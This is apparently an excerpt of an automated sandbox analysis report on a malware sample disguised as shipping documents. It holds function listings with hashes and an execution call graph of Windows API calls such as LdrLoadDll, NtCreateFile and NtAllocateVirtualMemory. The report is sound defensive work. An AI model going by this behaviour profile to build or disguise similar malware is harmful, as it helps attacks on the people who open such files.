                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Wow64 Emulation Layer
                                                                                                                                                                                                                                • API String ID: 3446177414-921169906
                                                                                                                                                                                                                                • Opcode ID: afde31509bac6f6ca13e3a388b3c8ee8963b8185e3cc18fa5271b7f0da548c6d
                                                                                                                                                                                                                                • Instruction ID: ef93a35468ce564d643bf49ab077e9563c3e3db97b5bf350f7b31d053afb8635
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afde31509bac6f6ca13e3a388b3c8ee8963b8185e3cc18fa5271b7f0da548c6d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8212CBA60055DFFEB029AA08D89DFF7B7DEF4469AB040054FA11A2110E735AE21DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F24EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 55030412e14dffcf57e247749b31869f74c6b6710139252625f242d562205b5f
                                                                                                                                                                                                                                • Instruction ID: 644e111eb22b377488b405208518e316a85348544ae9718831dab6596f670ee0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55030412e14dffcf57e247749b31869f74c6b6710139252625f242d562205b5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1712371E05629DFEF09CFA4C884ADDBBB9BF48314F25406AD906EB244E7B4A901CF54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2AA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: ff797e7580285c6194f1385540a5723d883f8901099ac6ef184673b1c41b5e7a
                                                                                                                                                                                                                                • Instruction ID: ef287b8b9f65667fa28bfbb6a83b0bdca4a67eb766a0412a2903849c32f84b2b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff797e7580285c6194f1385540a5723d883f8901099ac6ef184673b1c41b5e7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58514835710613EFDB09CE28C8A5A59B7E5BF89310B2141ADD906DBB20EB72BC51CF80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F24EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: a5cd9a2e8d64e2d57a615831848cc41a360761e83ef408b03583256beca880f2
                                                                                                                                                                                                                                • Instruction ID: 683b37c36e259fd28714a5f4a4a225218f9f1d164de9a69d9fc868fe15efdaff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5cd9a2e8d64e2d57a615831848cc41a360761e83ef408b03583256beca880f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F512571E04219DFDF08CF95D844ADDBBB5BF88360F25816AE816BB290E7B5A901CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F207A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4281723722-0
                                                                                                                                                                                                                                • Opcode ID: aa42a2cd50bbba8a04bc975c5485d054284a4075f43ac8bb97f62ca66e42f3b8
                                                                                                                                                                                                                                • Instruction ID: 51b45a02d8ee7531190148f12085c7911c4999c4a98c1019fb7e7124aae73210
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa42a2cd50bbba8a04bc975c5485d054284a4075f43ac8bb97f62ca66e42f3b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5313875E00268DFCF15DFA8D889A9DBBF0FB48720F20416AE811B7680D776A900CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1D58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                • Opcode ID: 143d1439a85bd4dffb45aed724d7bd6a55f7e0f8c7729824adb7f40e42174a27
                                                                                                                                                                                                                                • Instruction ID: 6eb8c2d6e097907425c9808397ed9deba3b05253a70beb7ecbb094654f1c826b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 143d1439a85bd4dffb45aed724d7bd6a55f7e0f8c7729824adb7f40e42174a27
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F3247B4D0036ADFDB25CF64C988BD9BBB4BF48304F0041E9E449AB241E7B56A94DF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1D0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • kLsE, xrefs: 1F1D05FE
                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1F1D0586
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                                • Opcode ID: a11bf75cef139c195a65167248d683783404addfc77c4be07664650e84f14cb0
                                                                                                                                                                                                                                • Instruction ID: 10ba42a90c01b2566e811700a1b2b9b86e74220034286b8f26d38f03ccf82c47
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a11bf75cef139c195a65167248d683783404addfc77c4be07664650e84f14cb0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7751BC75A0074ADFC720DFA5C4886EAB7F8AF44340F10853EE99E87644E774A514CFA2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1CDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                                                                • Opcode ID: b7524024b63e1f8beca46a1c18be1cbedd5042224d54b48a7ed8cab928821238
                                                                                                                                                                                                                                • Instruction ID: a37f5ed14d28357e14e0df765205b281fe252149e9dbb953c31d83359fd72621
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7524024b63e1f8beca46a1c18be1cbedd5042224d54b48a7ed8cab928821238
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D418DB1A087429FC300CF28C594A5ABBE4FF89314F454A6EF588DB701D771EA16CB86
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:2.9%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:1218
                                                                                                                                                                                                                                Total number of Limit Nodes:139
                                                                                                                                                                                                                                execution_graph 81302 88d4ad 81305 889c80 81302->81305 81306 889ca6 81305->81306 81313 878b60 81306->81313 81308 889cb2 81309 889cd6 81308->81309 81321 877e40 81308->81321 81353 888930 81309->81353 81314 878b6d 81313->81314 81356 878ab0 81313->81356 81316 878b74 81314->81316 81368 878a50 81314->81368 81316->81308 81322 877e67 81321->81322 81785 87a010 81322->81785 81324 877e79 81789 879d60 81324->81789 81326 877e96 81333 877e9d 81326->81333 81840 879c90 LdrLoadDll 81326->81840 81329 877f06 81330 88a270 2 API calls 81329->81330 81350 877fe4 81329->81350 81331 877f1c 81330->81331 81332 88a270 2 API calls 81331->81332 81334 877f2d 81332->81334 81333->81350 81793 87d170 81333->81793 81335 88a270 2 API calls 81334->81335 81336 877f3e 81335->81336 81805 87aed0 81336->81805 81338 877f51 81339 883a50 8 API calls 81338->81339 81340 877f62 81339->81340 81341 883a50 8 API calls 81340->81341 81342 877f73 81341->81342 81343 877f93 81342->81343 81817 87ba40 81342->81817 81345 883a50 8 API calls 81343->81345 81348 877fdb 81343->81348 81351 877faa 81345->81351 81823 877c70 81348->81823 81350->81309 81351->81348 81842 87bae0 6 API calls 81351->81842 81354 8891e0 LdrLoadDll 81353->81354 81355 88894f 81354->81355 81357 878ac3 81356->81357 81407 886e50 LdrLoadDll 81356->81407 81387 886d00 81357->81387 81360 878ad6 81360->81314 81361 878acc 81361->81360 81390 889530 81361->81390 81363 878b13 81363->81360 81401 8788d0 81363->81401 81365 878b33 81408 878320 LdrLoadDll 81365->81408 81367 878b45 81367->81314 81758 889820 81368->81758 81371 889820 LdrLoadDll 81372 878a7b 81371->81372 81373 889820 LdrLoadDll 81372->81373 81374 878a91 81373->81374 81375 87cf70 81374->81375 81376 87cf89 81375->81376 81767 879e90 81376->81767 81378 87cf9c 81771 888460 81378->81771 81381 878b85 81381->81308 81383 87cfc2 81384 87cfed 81383->81384 81778 8884e0 81383->81778 81386 888710 2 API calls 81384->81386 81386->81381 81409 888880 81387->81409 81391 889549 81390->81391 81422 883a50 81391->81422 81393 88956a 81393->81363 81394 889561 81394->81393 81461 889370 81394->81461 81396 88957e 81396->81393 81479 888180 81396->81479 81404 8788ea 81401->81404 81736 876e20 81401->81736 81403 8788f1 81403->81365 81404->81403 81749 8770e0 81404->81749 81407->81357 81408->81367 81412 8891e0 81409->81412 81411 886d15 81411->81361 81413 889212 81412->81413 81414 8891f0 81412->81414 81413->81411 81416 883e50 81414->81416 81417 883e5e 81416->81417 81418 883e6a 81416->81418 81417->81418 81421 8842d0 LdrLoadDll 81417->81421 81418->81413 81420 883fbc 81420->81413 81421->81420 81423 883a64 81422->81423 81424 883d85 81422->81424 81423->81424 81487 887ed0 81423->81487 81424->81394 81427 883b90 81490 8885e0 81427->81490 81428 883b73 81547 8886e0 LdrLoadDll 81428->81547 81431 883b7d 81431->81394 81432 883bb7 81433 88a0a0 2 API calls 81432->81433 81435 883bc3 81433->81435 81434 883d49 81437 888710 2 API calls 81434->81437 81435->81431 81435->81434 81436 883d5f 81435->81436 81441 883c52 81435->81441 81556 883790 LdrLoadDll NtReadFile NtClose 81436->81556 81438 883d50 81437->81438 81438->81394 81440 883d72 81440->81394 81442 883cb9 81441->81442 81444 883c61 81441->81444 81442->81434 81443 883ccc 81442->81443 81549 888560 81443->81549 81446 883c7a 81444->81446 81447 883c66 81444->81447 81450 883c7f 81446->81450 81451 883c97 81446->81451 81548 883650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 81447->81548 81493 8836f0 81450->81493 81451->81438 81505 883410 81451->81505 81453 883c70 81453->81394 81455 883c8d 81455->81394 81457 883d2c 81553 888710 81457->81553 81458 883caf 81458->81394 81460 883d38 81460->81394 81462 88937a 81461->81462 81463 889393 81462->81463 81575 88a020 81462->81575 81463->81396 81465 8893b4 81578 883060 81465->81578 81467 889400 81467->81396 81468 8893d7 81468->81467 81469 883060 3 API calls 81468->81469 81471 8893f9 81469->81471 81471->81467 81610 884390 81471->81610 81472 88948a 81473 88949a 81472->81473 81704 889180 LdrLoadDll 81472->81704 81620 888ff0 81473->81620 81476 8894c8 81699 888140 81476->81699 81480 8891e0 LdrLoadDll 81479->81480 81481 88819c 81480->81481 81730 5462b2a 81481->81730 81482 8881b7 81484 88a0a0 81482->81484 81485 8895d9 81484->81485 81733 8888f0 81484->81733 81485->81363 81488 883b44 81487->81488 81489 8891e0 LdrLoadDll 81487->81489 81488->81427 81488->81428 81488->81431 81489->81488 81491 8891e0 LdrLoadDll 81490->81491 81492 8885fc NtCreateFile 81491->81492 81492->81432 81494 88370c 81493->81494 81495 888560 LdrLoadDll 81494->81495 81496 88372d 81495->81496 81497 883748 81496->81497 81498 883734 81496->81498 81500 888710 2 API calls 81497->81500 81499 888710 2 API calls 81498->81499 81501 88373d 81499->81501 81502 883751 81500->81502 81501->81455 81557 88a2b0 LdrLoadDll RtlAllocateHeap 81502->81557 81504 88375c 81504->81455 81506 88345b 81505->81506 81507 88348e 81505->81507 81508 888560 LdrLoadDll 81506->81508 81509 8835d9 81507->81509 81513 8834aa 81507->81513 81510 883476 81508->81510 81511 888560 LdrLoadDll 81509->81511 81512 888710 2 API calls 81510->81512 81519 8835f4 81511->81519 81514 88347f 81512->81514 81515 888560 LdrLoadDll 81513->81515 81514->81458 81516 8834c5 81515->81516 81517 8834cc 81516->81517 81518 8834e1 81516->81518 81522 888710 2 API calls 81517->81522 81523 8834e6 81518->81523 81530 8834fc 81518->81530 81570 8885a0 LdrLoadDll 81519->81570 81521 88362e 81524 888710 2 API calls 81521->81524 81525 8834d5 81522->81525 81526 888710 2 API calls 81523->81526 81527 883639 81524->81527 81525->81458 81528 8834ef 81526->81528 81527->81458 81528->81458 81529 883501 81534 883513 81529->81534 81561 888690 81529->81561 81530->81529 81558 88a270 81530->81558 81533 883567 81535 88357e 81533->81535 81569 888520 LdrLoadDll 81533->81569 81534->81458 81537 88359a 81535->81537 81538 883585 81535->81538 81540 888710 2 API calls 81537->81540 81539 888710 2 API calls 81538->81539 81539->81534 81541 8835a3 81540->81541 81542 8835cf 81541->81542 81564 889e70 81541->81564 81542->81458 81544 8835ba 81545 88a0a0 2 API calls 81544->81545 81546 8835c3 81545->81546 81546->81458 81547->81431 81548->81453 81550 883d14 81549->81550 81551 8891e0 LdrLoadDll 81549->81551 81552 8885a0 LdrLoadDll 81550->81552 81551->81550 81552->81457 81554 88872c NtClose 81553->81554 81555 8891e0 LdrLoadDll 81553->81555 81554->81460 81555->81554 81556->81440 81557->81504 81559 88a288 81558->81559 81571 8888b0 81558->81571 81559->81529 81562 8886ac NtReadFile 81561->81562 81563 8891e0 LdrLoadDll 81561->81563 81562->81533 81563->81562 81565 889e7d 81564->81565 81566 889e94 81564->81566 81565->81566 81567 88a270 2 API calls 81565->81567 81566->81544 81568 889eab 81567->81568 81568->81544 81569->81535 81570->81521 81572 8891e0 LdrLoadDll 81571->81572 81573 8888cc RtlAllocateHeap 81572->81573 81574 8888df 81573->81574 81574->81559 81576 88a04d 81575->81576 81705 8887c0 81575->81705 81576->81465 81579 883071 81578->81579 81580 883079 81578->81580 81579->81468 81609 88334c 81580->81609 81708 88b250 81580->81708 81582 8830cd 81583 88b250 2 API calls 81582->81583 81586 8830d8 81583->81586 81584 883126 81587 88b250 2 API calls 81584->81587 81586->81584 81588 88b380 3 API calls 81586->81588 81722 88b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 81586->81722 81590 88313a 81587->81590 81588->81586 81589 883197 81591 88b250 2 API calls 81589->81591 81590->81589 81713 88b380 81590->81713 81593 8831ad 81591->81593 81594 8831ea 81593->81594 81597 88b380 3 API calls 81593->81597 81595 88b250 2 API calls 81594->81595 81596 8831f5 81595->81596 81598 88b380 3 API calls 81596->81598 81600 88322f 81596->81600 81597->81593 81598->81596 81719 88b2b0 81600->81719 81602 88b2b0 2 API calls 81603 88332e 81602->81603 81604 88b2b0 2 API calls 81603->81604 81605 883338 81604->81605 81606 88b2b0 2 API calls 81605->81606 81607 883342 81606->81607 81608 88b2b0 2 API calls 81607->81608 81608->81609 81609->81468 81611 8843a1 81610->81611 81612 883a50 8 API calls 81611->81612 81614 8843b7 81612->81614 81613 88440a 81613->81472 81614->81613 81615 8843f2 81614->81615 81616 884405 81614->81616 81617 88a0a0 2 API calls 81615->81617 81618 88a0a0 2 API calls 81616->81618 81619 8843f7 81617->81619 81618->81613 81619->81472 81723 888eb0 81620->81723 81623 888eb0 LdrLoadDll 81624 88900d 81623->81624 81625 888eb0 LdrLoadDll 81624->81625 81626 889016 81625->81626 81627 888eb0 LdrLoadDll 81626->81627 81628 88901f 81627->81628 81629 888eb0 LdrLoadDll 81628->81629 81630 889028 81629->81630 81631 888eb0 LdrLoadDll 81630->81631 81632 889031 81631->81632 81633 888eb0 LdrLoadDll 81632->81633 81634 88903d 81633->81634 81635 888eb0 LdrLoadDll 81634->81635 81636 889046 81635->81636 81637 888eb0 LdrLoadDll 81636->81637 81638 88904f 81637->81638 81639 888eb0 LdrLoadDll 81638->81639 81640 889058 81639->81640 81641 888eb0 LdrLoadDll 81640->81641 81642 889061 81641->81642 81643 888eb0 LdrLoadDll 81642->81643 81644 88906a 81643->81644 81645 888eb0 LdrLoadDll 81644->81645 81646 889076 81645->81646 81647 888eb0 LdrLoadDll 81646->81647 81648 88907f 81647->81648 81649 888eb0 LdrLoadDll 81648->81649 81650 889088 81649->81650 81651 888eb0 LdrLoadDll 81650->81651 81652 889091 81651->81652 81653 888eb0 LdrLoadDll 81652->81653 81654 88909a 81653->81654 81655 888eb0 LdrLoadDll 81654->81655 81656 8890a3 81655->81656 81657 888eb0 LdrLoadDll 81656->81657 81658 8890af 81657->81658 81659 888eb0 LdrLoadDll 81658->81659 81660 8890b8 81659->81660 81661 888eb0 LdrLoadDll 81660->81661 81662 8890c1 81661->81662 81663 888eb0 LdrLoadDll 81662->81663 81664 8890ca 81663->81664 81665 888eb0 LdrLoadDll 81664->81665 81666 8890d3 81665->81666 81667 888eb0 LdrLoadDll 81666->81667 81668 8890dc 81667->81668 81669 888eb0 LdrLoadDll 81668->81669 81670 8890e8 81669->81670 81671 888eb0 LdrLoadDll 81670->81671 81672 8890f1 81671->81672 81673 888eb0 LdrLoadDll 81672->81673 81674 8890fa 81673->81674 81675 888eb0 LdrLoadDll 81674->81675 81676 889103 81675->81676 81677 888eb0 LdrLoadDll 81676->81677 81678 88910c 81677->81678 81679 888eb0 LdrLoadDll 81678->81679 81680 889115 81679->81680 81681 888eb0 LdrLoadDll 81680->81681 81682 889121 81681->81682 81683 888eb0 LdrLoadDll 81682->81683 81684 88912a 81683->81684 81685 888eb0 LdrLoadDll 81684->81685 81686 889133 81685->81686 81687 888eb0 LdrLoadDll 81686->81687 81688 88913c 81687->81688 81689 888eb0 LdrLoadDll 81688->81689 81690 889145 81689->81690 81691 888eb0 LdrLoadDll 81690->81691 81692 88914e 81691->81692 81693 888eb0 LdrLoadDll 81692->81693 81694 88915a 81693->81694 81695 888eb0 LdrLoadDll 81694->81695 81696 889163 81695->81696 81697 888eb0 LdrLoadDll 81696->81697 81698 88916c 81697->81698 81698->81476 81700 8891e0 LdrLoadDll 81699->81700 81701 88815c 81700->81701 81729 5462d10 LdrInitializeThunk 81701->81729 81702 888173 81702->81396 81704->81473 81706 8891e0 LdrLoadDll 81705->81706 81707 8887dc NtAllocateVirtualMemory 81706->81707 81707->81576 81709 88b260 81708->81709 81710 88b266 81708->81710 81709->81582 81711 88a270 2 API calls 81710->81711 81712 88b28c 81711->81712 81712->81582 81714 88b2f0 81713->81714 81715 88a270 2 API calls 81714->81715 81716 88b34d 81714->81716 81717 88b32a 81715->81717 81716->81590 81718 88a0a0 2 API calls 81717->81718 81718->81716 81720 88a0a0 2 API calls 81719->81720 81721 883324 81720->81721 81721->81602 81722->81586 81724 888ecb 81723->81724 81725 883e50 LdrLoadDll 81724->81725 81726 888eeb 81725->81726 81727 883e50 LdrLoadDll 81726->81727 81728 888f97 81726->81728 81727->81728 81728->81623 81729->81702 81731 5462b31 81730->81731 81732 5462b3f LdrInitializeThunk 81730->81732 81731->81482 81732->81482 81734 88890c RtlFreeHeap 81733->81734 81735 8891e0 LdrLoadDll 81733->81735 81734->81485 81735->81734 81737 876e30 81736->81737 81738 876e2b 81736->81738 81739 88a020 2 API calls 81737->81739 81738->81404 81745 876e55 81739->81745 81740 876eb8 81740->81404 81741 888140 2 API calls 81741->81745 81742 876ebe 81744 876ee4 81742->81744 81746 888840 2 API calls 81742->81746 81744->81404 81745->81740 81745->81741 81745->81742 81747 88a020 2 API calls 81745->81747 81752 888840 81745->81752 81748 876ed5 81746->81748 81747->81745 81748->81404 81750 888840 2 API calls 81749->81750 81751 8770fe 81750->81751 81751->81365 81753 88885c 81752->81753 81754 8891e0 LdrLoadDll 81752->81754 81757 5462b90 LdrInitializeThunk 81753->81757 81754->81753 81755 888873 81755->81745 81757->81755 81759 889843 81758->81759 81762 879b40 81759->81762 81761 878a6a 81761->81371 81764 879b64 81762->81764 81763 879b6b 81763->81761 81764->81763 81765 879bb7 81764->81765 81766 879ba0 LdrLoadDll 81764->81766 81765->81761 81766->81765 81768 879eb3 81767->81768 81770 879f30 81768->81770 81783 887f10 LdrLoadDll 81768->81783 81770->81378 81772 8891e0 LdrLoadDll 81771->81772 81773 87cfab 81772->81773 81773->81381 81774 888a50 81773->81774 81775 888a56 81774->81775 81776 8891e0 LdrLoadDll 81775->81776 81777 888a6f LookupPrivilegeValueW 81776->81777 81777->81383 81779 8891e0 LdrLoadDll 81778->81779 81780 8884fc 81779->81780 81784 5462dc0 LdrInitializeThunk 81780->81784 81781 88851b 81781->81384 81783->81770 81784->81781 81786 87a037 81785->81786 81787 879e90 LdrLoadDll 81786->81787 81788 87a066 81787->81788 81788->81324 81790 879d84 81789->81790 81843 887f10 LdrLoadDll 81790->81843 81792 879dbe 81792->81326 81794 87d19c 81793->81794 81795 87a010 LdrLoadDll 81794->81795 81796 87d1ae 81795->81796 81844 87d080 81796->81844 81799 87d1e1 81802 87d1f2 81799->81802 81804 888710 2 API calls 81799->81804 81800 87d1c9 81801 87d1d4 81800->81801 81803 888710 2 API calls 81800->81803 81801->81329 81802->81329 81803->81801 81804->81802 81806 87aee6 81805->81806 81807 87aef0 81805->81807 81806->81338 81808 879e90 LdrLoadDll 81807->81808 81809 87af61 81808->81809 81810 879d60 LdrLoadDll 81809->81810 81811 87af75 81810->81811 81812 87af98 81811->81812 81813 879e90 LdrLoadDll 81811->81813 81812->81338 81814 87afb4 81813->81814 81815 883a50 8 API calls 81814->81815 81816 87b009 81815->81816 81816->81338 81818 87ba66 81817->81818 81819 879e90 LdrLoadDll 81818->81819 81820 87ba7a 81819->81820 81863 87b730 81820->81863 81822 877f8c 81841 87b020 LdrLoadDll 81822->81841 81825 877c83 81823->81825 81892 87d430 81823->81892 81836 877e31 81825->81836 81897 8833a0 81825->81897 81827 877ce2 81827->81836 81900 877a20 81827->81900 81830 88b250 2 API calls 81831 877d29 81830->81831 81832 88b380 3 API calls 81831->81832 81837 877d3e 81832->81837 81833 876e20 4 API calls 81833->81837 81836->81350 81837->81833 81837->81836 81839 8770e0 2 API calls 81837->81839 81905 87ac00 81837->81905 81955 87d3d0 81837->81955 81959 87ceb0 81837->81959 81839->81837 81840->81333 81841->81343 81842->81348 81843->81792 81845 87d09a 81844->81845 81853 87d150 81844->81853 81846 879e90 LdrLoadDll 81845->81846 81847 87d0bc 81846->81847 81854 8881c0 81847->81854 81849 87d0fe 81857 888200 81849->81857 81852 888710 2 API calls 81852->81853 